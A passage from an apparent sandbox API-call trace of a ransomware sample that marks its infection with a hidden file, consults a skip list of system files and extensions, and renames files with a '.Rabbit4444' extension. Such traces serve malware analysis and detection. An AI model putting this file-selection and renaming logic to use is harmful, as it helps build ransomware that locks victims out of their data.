dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.382] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.382] CloseHandle (hObject=0x278) returned 1 [0049.382] CloseHandle (hObject=0x27c) returned 1 [0049.383] GetCurrentThreadId () returned 0xd98 [0049.383] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6510 [0049.383] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Links", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0049.383] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf78b0 | out: hHeap=0xe0000) returned 1 [0049.383] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6508 | out: hHeap=0xe0000) returned 1 [0049.383] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Links" | out: lpString1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0049.383] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Links", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Links\\") returned="C:\\Users\\FD1HVy\\Links\\" [0049.383] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Links\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3" [0049.383] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\links\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.386] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.392] FlushFileBuffers (hFile=0x27c) returned 1 [0049.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.394] CloseHandle (hObject=0x27c) returned 1 [0049.394] lstrlenW (lpString="C:\\Users\\FD1HVy\\Links") returned 21 [0049.395] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.395] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xe6c1a7a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0049.395] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.395] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.395] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.395] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xe6c1a7a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.395] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.395] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.395] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.395] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.395] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.395] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6c1a7a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6c1a7a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6c40a86, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.395] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.395] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.395] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcee4480b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0049.395] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0049.395] lstrcpyW (in: lpString1=0x130eb64, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0049.395] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\desktop.ini", dwFileAttributes=0x2) returned 1 [0049.396] lstrlenW (lpString="desktop.ini") returned 11 [0049.396] lstrlenW (lpString="Rabbit4444") returned 10 [0049.396] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0049.396] lstrlenW (lpString=".dll") returned 4 [0049.396] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0049.396] lstrlenW (lpString=".lnk") returned 4 [0049.396] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0049.396] lstrlenW (lpString=".ini") returned 4 [0049.396] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0049.396] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce90d59d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Rabbit4444.exe") returned -1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="windows") returned -1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="bootmgr") returned 1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="pagefile.sys") returned -1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="boot") returned 1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ids.txt") returned -1 [0049.396] lstrcmpiW (lpString1="Desktop.lnk", lpString2="NTUSER.DAT") returned -1 [0049.396] lstrcpyW (in: lpString1=0x130eb64, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0049.396] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", dwFileAttributes=0x0) returned 1 [0049.397] lstrlenW (lpString="Desktop.lnk") returned 11 [0049.397] lstrlenW (lpString="Rabbit4444") returned 10 [0049.397] lstrcmpiW (lpString1="esktop.lnk", lpString2="Rabbit4444") returned -1 [0049.397] lstrlenW (lpString=".dll") returned 4 [0049.397] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0049.397] lstrlenW (lpString=".lnk") returned 4 [0049.397] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0049.397] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xcec7abde, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Rabbit4444.exe") returned -1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="windows") returned -1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="bootmgr") returned 1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="pagefile.sys") returned -1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="boot") returned 1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ids.txt") returned -1 [0049.397] lstrcmpiW (lpString1="Downloads.lnk", lpString2="NTUSER.DAT") returned -1 [0049.397] lstrcpyW (in: lpString1=0x130eb64, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0049.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", dwFileAttributes=0x0) returned 1 [0049.397] lstrlenW (lpString="Downloads.lnk") returned 13 [0049.397] lstrlenW (lpString="Rabbit4444") returned 10 [0049.398] lstrcmpiW (lpString1="nloads.lnk", lpString2="Rabbit4444") returned -1 [0049.398] lstrlenW (lpString=".dll") returned 4 [0049.398] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0049.398] lstrlenW (lpString=".lnk") returned 4 [0049.398] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0049.398] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="Rabbit4444.exe") returned -1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2=".") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="..") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="windows") returned -1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="bootmgr") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="pagefile.sys") returned -1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="boot") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="ids.txt") returned 1 [0049.398] lstrcmpiW (lpString1="OneDrive.lnk", lpString2="NTUSER.DAT") returned 1 [0049.398] lstrcpyW (in: lpString1=0x130eb64, lpString2="OneDrive.lnk" | out: lpString1="OneDrive.lnk") returned="OneDrive.lnk" [0049.398] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", dwFileAttributes=0x0) returned 1 [0049.399] lstrlenW (lpString="OneDrive.lnk") returned 12 [0049.399] lstrlenW (lpString="Rabbit4444") returned 10 [0049.400] lstrcmpiW (lpString1="eDrive.lnk", lpString2="Rabbit4444") returned -1 [0049.400] lstrlenW (lpString=".dll") returned 4 [0049.400] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0049.400] lstrlenW (lpString=".lnk") returned 4 [0049.400] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0049.400] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x94664823, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x53a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 0 [0049.400] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0049.400] lstrcpyW (in: lpString1=0x130eb64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.400] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\links\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.400] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.400] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.400] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.401] CloseHandle (hObject=0x278) returned 1 [0049.401] CloseHandle (hObject=0x27c) returned 1 [0049.401] GetCurrentThreadId () returned 0xd98 [0049.401] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0049.401] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Favorites", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0049.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102a50 | out: hHeap=0xe0000) returned 1 [0049.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0049.402] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Favorites" | out: lpString1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0049.402] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0049.402] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Favorites\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3" [0049.402] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\favorites\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.403] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.406] FlushFileBuffers (hFile=0x27c) returned 1 [0049.407] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.407] CloseHandle (hObject=0x27c) returned 1 [0049.408] lstrlenW (lpString="C:\\Users\\FD1HVy\\Favorites") returned 25 [0049.408] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.408] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6c40a86, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0049.408] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.408] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.408] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.408] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.408] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6c40a86, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.408] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.408] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.408] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.408] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.408] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.408] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6c40a86, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6c40a86, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6c66b9f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.408] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.408] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.408] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2="Rabbit4444.exe") returned -1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2=".") returned 1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2="..") returned 1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2="windows") returned -1 [0049.408] lstrcmpiW (lpString1="Bing.url", lpString2="bootmgr") returned -1 [0049.409] lstrcmpiW (lpString1="Bing.url", lpString2="pagefile.sys") returned -1 [0049.409] lstrcmpiW (lpString1="Bing.url", lpString2="boot") returned -1 [0049.409] lstrcmpiW (lpString1="Bing.url", lpString2="ids.txt") returned -1 [0049.409] lstrcmpiW (lpString1="Bing.url", lpString2="NTUSER.DAT") returned -1 [0049.409] lstrcpyW (in: lpString1=0x130eb6c, lpString2="Bing.url" | out: lpString1="Bing.url") returned="Bing.url" [0049.409] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url", dwFileAttributes=0x0) returned 1 [0049.409] lstrlenW (lpString="Bing.url") returned 8 [0049.409] lstrlenW (lpString="Rabbit4444") returned 10 [0049.409] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.409] lstrlenW (lpString=".dll") returned 4 [0049.409] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0049.409] lstrlenW (lpString=".lnk") returned 4 [0049.409] lstrcmpiW (lpString1=".url", lpString2=".lnk") returned 1 [0049.410] lstrlenW (lpString=".ini") returned 4 [0049.410] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0049.410] lstrlenW (lpString=".sys") returned 4 [0049.410] lstrcmpiW (lpString1=".url", lpString2=".sys") returned 1 [0049.410] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.410] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.410] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14072054750) returned 1 [0049.410] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=208) returned 1 [0049.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0049.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0049.410] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d0, lpName=0x0) returned 0x298 [0049.411] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d0) returned 0x70000 [0049.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.412] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.412] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.412] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.413] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14072335348) returned 1 [0049.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0049.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0049.413] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.413] CloseHandle (hObject=0x298) returned 1 [0049.413] CloseHandle (hObject=0x278) returned 1 [0049.414] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Favorites\\Bing.url.Rabbit4444") returned 45 [0049.415] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), lpNewFileName="C:\\Users\\FD1HVy\\Favorites\\Bing.url.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url.rabbit4444"), dwFlags=0x1) returned 1 [0049.415] InterlockedExchangeAdd (in: Addend=0xff618, Value=208 | out: Addend=0xff618) returned 21085136 [0049.415] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3579 [0049.415] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0049.415] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.415] lstrcmpiW (lpString1="desktop.ini", 